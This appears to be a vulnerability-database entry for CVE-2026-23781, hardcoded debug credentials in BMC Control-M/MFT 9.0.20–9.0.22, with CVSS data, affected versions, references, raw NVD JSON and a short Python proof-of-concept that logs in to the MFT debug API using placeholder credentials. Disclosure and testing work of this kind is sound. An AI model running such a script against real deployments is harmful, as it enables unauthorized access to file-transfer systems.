CVE-2026-23781

Description

An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. A set of default debug user credentials is hardcoded in cleartext within the application package. If left unchanged, these credentials can be easily obtained and may allow unauthorized access to the MFT API debug interface.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:bmc:control-m\/managed_file_transfer:*:*:*:*:*:*:*:* - VULNERABLE

BMC Control-M/MFT 9.0.20

BMC Control-M/MFT 9.0.21

BMC Control-M/MFT 9.0.22

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL for the MFT API Debug Interface
target_url = "http://target-host:port/mft/api/debug"

# Hardcoded credentials extracted from the application package
username = "debug_user"
password = "hardcoded_password"

def exploit():
    print(f"[*] Attempting to connect to {target_url}...")
    
    # Example using Basic Authentication
    response = requests.get(target_url, auth=(username, password), verify=False)
    
    if response.status_code == 200:
        print("[+] Exploit successful! Access granted to debug interface.")
        print("[+] Response data:")
        print(response.text)
    else:
        print("[-] Exploit failed.")
        print(f"[-] Status code: {response.status_code}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23781
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23781
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23781/
[4] VulDB https://vuldb.com/cve/CVE-2026-23781
[5] https://docs.bmc.com/xwiki/bin/view/Control-M-Orchestration/Control-M/ctm9022/Patches/Control-M-MFT-PAAFP-9-0-22-025/
[6] https://www.bmc.com/support/resources/issue-defect-management.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23781", "sourceIdentifier": "[email protected]", "published": "2026-04-10T16:16:30.400", "lastModified": "2026-04-27T19:11:38.623", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. A set of default debug user credentials is hardcoded in cleartext within the application package. If left unchanged, these credentials can be easily obtained and may allow unauthorized access to the MFT API debug interface."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bmc:control-m\\/managed_file_transfer:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.20", "versionEndIncluding": "9.0.22", "matchCriteriaId": "F19C6505-D28F-4BF0-B347-789719492E0E"}]}]}], "references": [{"url": "https://docs.bmc.com/xwiki/bin/view/Control-M-Orchestration/Control-M/ctm9022/Patches/Control-M-MFT-PAAFP-9-0-22-025/", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.bmc.com/support/resources/issue-defect-management.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}